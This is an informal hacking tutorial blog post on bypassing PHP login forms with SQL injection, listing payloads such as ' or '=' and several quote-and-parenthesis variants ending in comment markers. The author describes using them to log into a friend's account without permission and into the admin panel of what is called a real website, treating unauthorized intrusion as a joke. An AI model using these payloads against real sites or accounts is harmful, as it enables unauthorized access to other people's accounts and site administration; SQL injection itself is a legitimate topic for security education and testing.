Hacking Tutorials SQL Injection

Login Bypass With SQL Injection

First of all read the previous article SQL Injection Explained From Scratch so you can get this stuff better.
So today we are going to learn how we can bypass logins using SQL Injection
Now lets get straight to the point, this is a sample login form
login-form
So innocent and simple, it simply matches the user input to the records in the database and lets the user login into his account if the record exists and if there is no match then it shows an error like “The username or password is incorrect”
It seems secure but as hackers say “Security is an illusion” so to clear this illusion lets take a close look at the login form by checking its source code.

So this is the source code of a webpage created using a programming language named PHP and it takes the user input and puts it into the SQL Query and then checks if any row exists with that value and allows you to Log in.
Wait wait wait….It takes the user input and puts it into the SQL Query?
What if there is no security feature to check what user enters and we can submit anything?
Yeah I am talking about submitting a SQL Query and interacting with the database and this is what we call SQL Injection.
So lets try to login without username and password. Yeah without username and password.
First of all let see which part of code we need to deal with

Lets try to understand what this code does by breaking it into parts
1. $query=
It contains the query which is going to be processed

2. username=’$username’ and password=’$password’
It assigns the values entered by the user to username and password so it can be searched in the database.

3. select username,password from users where
It selects the two columns, username and password from a table named users of the the same information (username=’$username’ and password=’$password’) provided by the user.
Confused?
Well it gets username and password from the user and then looks for columns named Username and Password in a table named “users”
Still confused?
I told you man…I told you to read the previous article. Please take everything I say seriously.
Hmmm so lets take advantage of the behavior of this code i.e. it lets the user enter anything.
Look at those two red colored single quotes
username=$username
They are indicating the start and end of the value. Now lets have some fun by adding a ‘ (single quote) to the username field as it will disturb the syntax (rules and shit bro) of the code.
When we do this we will get an like You have an error in your SQL Syntax blah! blah! blah!
With that error we just confirmed that the code accepts commands from the user
Now lets say I know that a friend of mine has a account on this website with the username Chutiya but I don’t know his password but I know that this website is vulnerable to SQL Injection.
So I will enter Chutiya in the username and ‘or’ ‘=’
And boom!! I got into his account!
Don’t kill me please…I will tell everything.
Well I entered ‘or’ ‘=’ which made the query to return true ummmm it told the code that password entered by the user is correct.
So the query only matched the username Chutiya and not the password because we made it assume that the password is correct. *Like a boss*
Now following the same method one may gain admin access to a website by bypassing the Admin Panel.
Admin panel is a page of a website where the admin of the websites logs in and makes changes to the website.
In admin panel we can try to enter admin, superuser etc. in the username field and then again ‘or’ ‘=’ in the password field.
But you can log in without knowing the username! Just inject ‘or’ ‘=’ in both fields i.e. username and password fields.
Let me show you a real scenario, I have admin panel of a real website here:
admin-panel
Now lets put(inject) ‘or’ ‘=’ in both username and password field:
sql-injection
*Hacker Voice* I am in:
login-bypass
So what happened here?
Well I confused the code to think that both username and password are correct and it gave us access as admin.
Now lets try something else

You see that ? When it is used to comment out something in SQL or you can say it represents start of a comment.
Comments do not get executed and hence the query will not check if password is correct or not.
So we talked about a code that had the following query:

Now lets see some variations of the query and how we can inject them

Query:

Injections:
” or true–
” or “”=”
” or 1–
” or “x”=”

Query:

Injections:
‘) or true–
‘) or (”)=(‘
‘) or 1–
‘) or (‘x’)=(‘

Query:

Injections:
“) or true–
“) or (“”)=(”
“) or 1–
“) or (“x”)=(”

Query:

Injections:
‘)) or true–
‘)) or ((”))=((‘
‘)) or 1–
‘)) or ((‘x’))=((‘

Life is too short to explain every injection above in detail so just keep learning and you will find out how they work.
Till then keep reading ./logout
Also Read: A Beginner’s Guide To Ports


About the author

D3V

I am Somdev Sangwan also known as D3V. I am n00b and I love computers and hacking. I am a python freak and your friendly neighborhood hacker.

7 Comments

Click here to post a comment

Subscribe Now

Subscribe for free and get latest articles delivered right into your inbox.

Thank you for subscribing.

Something went wrong.

Categories

>-----ADVERTISEMENT-----<